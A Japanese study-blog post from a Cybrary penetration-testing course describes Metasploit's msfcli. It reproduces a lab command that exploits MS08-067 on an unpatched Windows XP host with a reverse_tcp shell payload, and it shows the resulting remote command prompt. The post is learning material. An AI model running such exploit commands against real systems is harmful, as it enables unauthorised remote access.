CYBRARY でのお勉強 4 日目 – Advanced Penetration Testing, Module 3 Metasploit, msfcli –
今日も引続きメタスプロイトの学習で msfcli について学習しました。
msfcli とはなんぞや? cli とつくことからわかるように command line interface のことですが、Offensive Security のページの説明によると、
The msfcli provides a powerful command line interface to the framework. This allows you to easily add Metasploit exploits into any scripts you may create.
と書かれています。フレームワーク(メタプロイト)に CLI を提供しますってことですが、一言でいうと脆弱性がないかを確認するために使うコマンドラインツールって理解で良いみたいです。
part 5 の msfcli の動画をじっくり何度か見ましたが、その中で Kali Linux から Windows XP に不正アクセス(ログイン)する内容でした。その手法がどうやら MS08_067 の脆弱性を利用するもののようです。
MS08_067 って何?と思ってググるとマイクロソフトのページには「Server サービスの脆弱性により、リモートでコードが実行される」とありました。当然、パッチはとっくに作られているのですがデモではそのパッチが当てられていない環境で実行したんだと思います。
Kali Linux から下記コマンドを叩いていました。
msfcli exploit/windows/smb/ms08_067 netapi payload=windows/shell/reverse_tcp RHOST=192.168.1.76 LHOST=192.168.1.77 E
上記のデモ環境では、
- 192.168.1.76 が Windows XP
192.168.1.77 が msfcli を実行する Kali Linux
でした。
動画教材はすべて英語ですので正確に意味が取れているか不確かな部分もあるのですが、上記コマンドとあわせて考えると間違いなさそうです。
Kali Linux で msfcli コマンドを実行したあと、以下のようにプロンプトが変わりました。
C:¥WINDOWS¥system32>
これを見て XP にログインしたということだと理解しました。